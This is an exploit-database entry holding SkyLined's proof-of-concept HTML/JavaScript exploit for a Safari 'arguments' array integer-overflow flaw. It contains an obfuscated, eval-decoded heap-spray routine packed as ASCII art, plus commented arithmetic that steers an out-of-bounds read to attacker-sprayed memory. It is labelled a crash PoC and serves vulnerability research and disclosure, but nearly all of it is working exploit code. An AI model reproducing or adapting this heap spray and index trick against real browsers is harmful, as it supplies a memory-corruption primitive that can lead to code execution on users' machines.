Safari (Arguments) Array Integer Overflow PoC (New Heap Spray)

2009-01-05T00:00:00
ID 1337DAY-ID-6707
Type zdt
Reporter SkyLined
Modified 2009-01-05T00:00:00

Description

Exploit for multiple platform in category dos / poc

                    
                      ==============================================================
Safari (Arguments) Array Integer Overflow PoC (New Heap Spray) 
==============================================================


<BODY>
	<CODE id="sploit status"></CODE>
	<CODE id="heapspray status"></CODE>
	<SCRIPT>

i=0;eval(unescape(("gA#MAAA#Ag#[email protected][email protected]@UNUAU#[email protected]#[email protected]#[email protected]?N?A?#?A?A???g?O?E?E?E?U?M?N??AA#E?A#[email protected]?A????AONgAE#M?ANg#MNO#ENO#[email protected]#A???gAAU?AN#MAAN?OAE?A#MaN#EMAANgAAEgA#M#A#?#\
Eg                                                                                                                                         #\
#M                                                            NgAN?#?Q?                                                                         U\
?U                                                         AOgA?AAUgAAE#EMAg#N                                                                       @\
#U                                                       ?AAEg##[email protected]?NgE                                                                     A\
O?                                                      AAMg#[email protected]#NAEAN?E??MEAOAUAA#@U                                                                    ?\
AE             g##ENMgAgAgA?                                  [email protected]##EgM#E?g?U    [email protected]#MgEAUAA                                                                AMA#A  E\
AA          [email protected]#[email protected]@#AAN#N??NN#A?                              g#NU#U#gMMAA        MA#AEAA                                                              [email protected]#[email protected] A\
[email protected]         #?AN#???NN#??g##U#U#gMNN#AAN#NAE                            NN#?AN#?AEg          M#E??A                                             AA?              ?O#AAOgAAU?A A\
Ug       #N#M?aMgA#?gA#ENNAA#@AA#@AA#@AAUE?N?E                          g##Mg##?g##           EgEgMU                                             E?E#M?         Aa??A#EAUAAAUAU  #\
@A      UAAUEUg#MNN#?U#U#UEAO#MNN#AU#U##EAE#[email protected]                         #NU##?#?UE            Mg#M?                                               ??N?Ug#?AU  E?EAEUA#M#  ?gO#A#?  U\
E?     EANUA#M#AUE?EANN?A#?EgE?A#MaAUEMN#M?NgA?U?UU                        Eg#AU???g#M             AUAAA                                                  UAAUEg#A#MO    #MAUAAA   U\
AA    UEMU#M?NgA?U?U#E?EUU    AOA#?OgA???M?AM?gU?E                        AOA??ENM???             [email protected]                                                           gU?EAO    A\
MA    #[email protected]?AAEA        E?EgU?EA?UEg#?E?                        [email protected]#?             A???                                                          NgA?E     A\
E?   [email protected]?           NM?gU?EA?MAAA#N                       AA#AAA#aAA#AAA#           AAA#?                                                         U?#Eg      A\
UU   AUAUAO?EAgME?            A??ggg#[email protected]                       N#EAMAEAE?EA?MAAA#NU?        #E?N#                                                         M?EUN      A\
@?   @gA#[email protected]#M?g?             [email protected]?NAM#EMAA                        @AE????gAAOg#NAA           @MEA    @[email protected]                                                  A?AA       E\
g#  NAAM#[email protected]#N            AAMgNME??AU?NN#M                        [email protected]             ?AAA   OAUAAUMA                                                 N??A       ?\
AA  AN?a?N?U?UAO         UMAN??AA?AAEU?#EMMAN??A                        A?A#MgA?A              #EMMA   N??A?AAa                                                 M??#       E\
g#  ?AgAAA?E?M?A            ??gAgAAOMMAU?NMNN                         E?U???               gME?   ?N#A#g                                                  #AU        ?\
??   gAE#MA#g#A#M             ONEg#MOAO??M                          NNEg                #MOM                  E??N#                                   A#g#        A\
#M   O#M??M?AUAUg               AA??gMANA                           N                ANAN                AU?M?#UA??gMA                                 A??U        g\
A#   EU?UN#UAAAA#               NAUAA#E      MAA                                     #MNA      EA#     MN ANME?NUEAOAAAMAU#MA                                #g#        A\
U?    ??gAEA#g#A#M               O#EgM     NEg#gA                                     gAME     ?gA??E   ?U?UME??AU?NN   #?E#MNA?                               a?A        ?\
E?    [email protected]              E#E?     A#MAUAAAU                           A         A#E?   U#MNA?#?O  ?E?UAONA?U??      ?gAO?O          AE#NAE                 A?NA        ?\
U?     ??gAO#AAEAE#             E?     ???gAAO?g#M                          ?U#E?        g#N#  M#?#E?gAMAM    N#?AAE#M       ?A#EMA        [email protected]??ggAO               #AAU        ?\
gA      EAE?AAE#M??#                 EgMNMgAgAgA?NA                        @?AUO#@        AU?N     MNUEg#U   AME??N#        A#MU#       M??#EU  NA#UAME?              [email protected]?        ?\
gA       [email protected]#Ug                #[email protected][email protected]                       ?#EUNANU?        #EUN     AUAUgA    ANg#g#        gA?MM      E?gA     @?N?A?A             NMg         #\
g#         [email protected]??AgA?E?                U?E???Ng#[email protected]??          ??A?            [email protected]@gA?        [email protected]     AA#AO#    [email protected]?        a?NgA      g#?      A?AA??A             gEA         @\
??           gA?N?g?M?                A?NgA?U?E???         [email protected]           [email protected]?NNM?        OAU#      NMNNE    [email protected]@        ?NNM     ?OME       N#??#M             A#A         ?\
A?            g#gAgAME                ?gA??E?U?UA        OA#?EAU    MEA      E#E????g       AAO?      NA?MEA    @A#?Q?        Eg#N #?O   #M?        N?OggA        @M#AO? NAE         #\
EM              A?OAA#A#               MaM#NAEgA?O       gA??gg    [email protected]?N?       [email protected]       gAgA      ??gAA    OAUAA        A???  ??g#? AgA        g#[email protected]??       [email protected]#[email protected]?M         g\
Ag               #[email protected]?A?              AA??Ag??A      ?NA?AO     ????gA?       [email protected]?       @?O#      EAEU?    U?#E??        ??gA    [email protected]       [email protected]#      AE?NAMN #?E#Mg#         A\
E?                 NAMAE?A             AM#EUNAUA     UgAAE     ?Ng#UEgA       ?A?A?       Mg#UA       [email protected]?#     [email protected]?        [email protected]?     ?????g#?AgAA  @UA?OAN?     ?#Na     ?AU#AA       E\
UN                   #[email protected][email protected]            ?AUNANU?#    E??#M      ??UO#@AUA       O?O#N      #N#NA       EAEAE    ?EAE?        ?UOA     O?O  #N#N#[email protected]     #EMA      [email protected] #NM      E\
N#                     ?EAAgO            ?#?Og#g#  #M??N        @AMME#E??       #M??U      OMEA        EAE?     ?UO?E        AAg     O?#?     Og#g#AU      MEM      NgMg        M\
N?                      #?aAAEA          @?A?#[email protected]#?A         ?Eg##?AUA      [email protected]      g?Eg        A?OA     @MEg#        UEg     A?A            ?A  [email protected]?a      [email protected]#        M\
AA                       UAAU?UNA         NU?UEg#UE#M??U          E?Ng#AE#M     AEAM      UE?EU        Eg#     #[email protected]        UEU     ?#M#          ?UE   ?EA       g#MA        #\
Ug     gN                   AOA#A?A??        #NM?U?A?OANAU#N          MNNE?#NM?    U?A?      OANME         N#      MA         A#g      #UEN        @#UA    EA?       #AN#A        #\
g#   UEAE#M                    A#g#UEgNA       OUMAU#NMN?A?Ug#?A           gEN?UAAE   #E?      [email protected]?                         A?#      [email protected]?     ???gA     ?Mg       #UAME        ?\
g?  Ag#UAAEAU#                    NMNgMNEg#U      AAEMEN   #MAA#Mg            #??NAg#N#MM?     AMAaA                          O#E      ?NAg#U#M M?AEA#AO     N#N       E#MAO        ?\
NA  EUAAE?NANUAAEA?                   #A#E?EN?AU     [email protected]#MAO?     NANN?A             #?EgE?A     AEA?#           A#Eg#            Ag#       MA#Mg#?NEAMA#AOA      E#E#      ENEAEA       #\
AO AE#EUE?Ng#AEAEg#AgAM                  #Mg#AgAEA#    g#UEUO       NEAEg#            [email protected]     AUAEA      ?#[email protected]#Ag       [email protected]       EUE?EUEg#AEAEU      EU?A       E#MAE       U\
E? EAgAE#MA#Mg#?AM                     AE#EAENEg#    MOAOAU       AAAUAUg           AAN     ?U?#?  [email protected][email protected]?NUEg#UN?M?A?#?Eg#[email protected][email protected]#U?AN??A    E?N        [email protected][email protected]       #UAA      @gNUAA       #\
Ug #EUNAMUAAO?NA                      gAEA#AOAE#E    UN?Ag        #UAAEAU#          NMN    ?A?Ug#?AgEUNA#???U?U?A           [email protected]?g? NgA         ?A?A?g?A     U   ?#EMA      [email protected]       ?\
A? ???AONUAEAN?                       ANUAOAE#EMA    ggME?         A??ggAN?         g?#    AEggME?A??ggAN?g       ?#AOAE#EU       [email protected]#UAA           @?A      ?   ??N?AA     NU?UEMU      A\
O?  ??OMN#EgMgMA                       #gA?AANAgAN    ?A?AN         Mg#g##EAN        ??#   Na?AU#OAEAE?       ?#?gO#gA??g#NU#U         #MAMgMA                gA    gAgA?AM    A?EAEUA      M\
A#  @MA?EANUAMA#                      @[email protected]?UA#gEg     #gA?          [email protected]?A?       a?E   ???E?aNAg        #ANAagAgAME?gAAgA?N?        #gA ?E???NA             O?E    A??AgA?E?N?  N?a?AAEA     O\
?A   [email protected]?NAA?#                     ?EA#?EgE?A?     ????M          [email protected]???N?A?N      gAgN  UEg#?A          gAAA?E?M?A??gAgA[email protected]?A?N?       ggA  ?OUNA#A?          A??U?      ??gAOAUAAUAAO?A?A?AUE     A\
#?    EgE?AU##?#?#                   [email protected]?NgE      UA#@         [email protected]?AUAAAE     Ug?E  A#g           A?NgA    gAAgUOANg#gA?      Ag#g    AgAAOUEAEA     A?#?EUE?        AgAUE#EA#UU#M?N?Ag?    ?\
E?     g?U??gAANgAg#                 UEAN?g?A?NgA       M??E      UM?NgA?ggA?M?A?Ng     Ag#A             N?#?Q      ?U?U?A?AUNAE     AUAA      U??EAAgEgA?Ag#AN?U?#?U?           [email protected]?AUAU    ?\
AA       EAE?EMN??A?gAgA             [email protected]?U?A         ?M?O        ?NgAMA?E??AO      M#AN            gA?M?        AUEMAAUAA#EMA  AUAUAAM       ??NAA?NgA?g?AgAAgMg              ?AAA?Ag?     U\
Eg        #?AMOgA?UgAg#ME#@gO#     NU##?A?#AME?E?NME          #M??         OAAOMU?      ?AA??          ?N?           AAO?N?N?A?UUEMM??AggA?        [email protected]@UEMNAE#EgM                        M\
?A           [email protected][email protected][email protected]#?gO#@NAAM?             U?O          AN        N#AE                       gENAA#?AgAgAME?gNAA          ??N?Ag#[email protected]#E                         N\
?U              NAUAUgAA#[email protected]???N?A                [email protected]                  M#A?                        ???U?AAA??ANNO            M#[email protected]?                          ?\
gA                 [email protected]?AAN                    gA?                  ?ANNE                          UEA?A?N               E?EAO                           ?\
A?                                                              A?AUE                                             AUU                           @\
NE                                                              AUAAU                                             A                            ?\
NA                                                             g#EUNg                                                                         N\
UA                                                             AO?NAg                                                                         N\
UA                                                             #???U?                                                                          U\
?A                                                            ?agAAg?                                                                          N\
gA                                                            ?A?A?g?A                                                                          N\
Mg                                                           A?ANNMAA#                                                                          ?\
A?                                                          ??NgA?EA?##                                                                          A\
@A                                        [email protected]?A???           [email protected]                                                                           A\
E?                                      [email protected]?AgEgA?Ag#?AANU?g      NAOA#A?A??#?U???                                                                           #\
?A                                    #MAUAAgA?  N?A?A??mE?A?AU??A?O?Eg#??MAgEAUAAUgMA?g                                                                            U\
#U                                   #MAA        OMANN?OAEA#UA?Eg#A#???Eg#AA?N?a                                                                             ?\
E?                                   gg             A??gA?N?A?EANAE?U?NgA?M                                                                              A\
@?                                  O                [email protected]@?NA#?E?                                                                                ?\
gA                                                                                                                                         ?\
?ANAOAA#E????gAAO?#aM#g#?aE?#AMAMaE?A#MAOgA#M?AANg#[email protected]?U?EgAAOgAAN?#?E?AgAANgAAO?#[email protected][email protected]#E?Ag??A?UAO?AAE#EA?A?AM?#AA#E#aAE#N").replace(/./g,function(c){return" `'^*\\/|-_.swdibYPW,".indexOf(c)<0?(i++%2?'':'%')+(c.charCodeAt()&15).toString(16):''})))

		// The index for the "arguments" array in a JavaScript function in
		// Safari suffers from a signedness issue that allows access to elements
		// that are out of bounds. The index is cast to a signed value before it
		// is compared to the length of the array to check if it within the
		// bounds. Integer values larger than 0x8000,0000 will be cast to a
		// negative value and because they are always smaller then the length,
		// they are treated as a valid index.
		// The index into the arguments array ends up in instructions
		// that multiply it by 4 to access data in an array of 32 bit values.
		// There are no checks for overflows in this calculation. This allows us
		// to cause it to access anything in memory:
		//   Pointer to object = base address + 4 * index
		// The base address varies only slightly and is normally about
		// 0x7FEx,xxxx. If we create a heap chunk of 0x0100,0000 bytes at a
		// predictable location using heap spraying, we can then calculate an
		// index that will access this memory.
		var iBase = 0x7fe91e6c; // Random sample - value varies but not a lot.
		var iTargetArea = 0x10000000;
		// Be advised that heap spraying is "upside down" in Safari: strings
		// are allocated at high addresses first and as the heap grows, the
		// addresses go down. The heap will therefor grow in between a lot of
		// DLLs which reside in this area of the address space as well.
		// We'll need to find an area of memory to spray that is not likely to
		// contain a DLL and easy to reach.
		var iTargetAddress = 0x55555555;
		//   iTargetAddress(~0x5555,5555) = iBase(~0x7FEx,xxxx) + 4 * iIndex
		// 4 * iIndex = (iTargetAddress - iBase) (optionally + 0x1,0000,0000 because an integer overflow is needed)
		var iRequiredMultiplicationResult = iTargetAddress - iBase + (iTargetAddress < iBase ? 0x100000000 : 0) 
		// iIndex = (iTargetAddress - iBase) / 4
		var iIndex = Math.floor(iRequiredMultiplicationResult / 4)
		// We need to trigger the signedness issue so the index must be larger
		// then 0x8000,0000. Because of the integer overflow in the
		// multiplication, we can safely add 0x4000,0000 as often as we want;
		// the multiplication will remove it from the result.
		while (iIndex < 0x80000000) iIndex += 0x40000000
		document.getElementById("sploit status").innerHTML = (
			"iBase + 4 * iIndex = " +
			"0x" + iBase.toString(16, 8) + " + 4 * " + iIndex.toString(16, 8) + " = " +
			"0x" + (iBase + 4 * iIndex).toString(16, 8) + "<BR>"
		);
		// Set up heap spray
		var oHeapSpray = new HeapSpray2(iTargetAddress, DWORD(0xDEADBEEF))
		oHeapSpray.oOutputElement = document.getElementById("heapspray status")
		// Spray heap asynchronously and call sploit when done.
		oHeapSpray.spray(sploit)
		function sploit(oHeapSpray) {
			// This will cause an access violation using the value 0xDEADBEEF,
			// which comes from the strings we sprayed the heap with.
			// 6aa3d57f 8b4f0c     mov   ecx,dword ptr [edi+0Ch] ds:0023:deadbefb=????????
			arguments[iIndex];
		}
		function DWORD(iValue) {
			return String.fromCharCode(iValue & 0xFFFF, iValue >> 16)
		}
	</SCRIPT>
</BODY># 0day.today [2018-03-14] #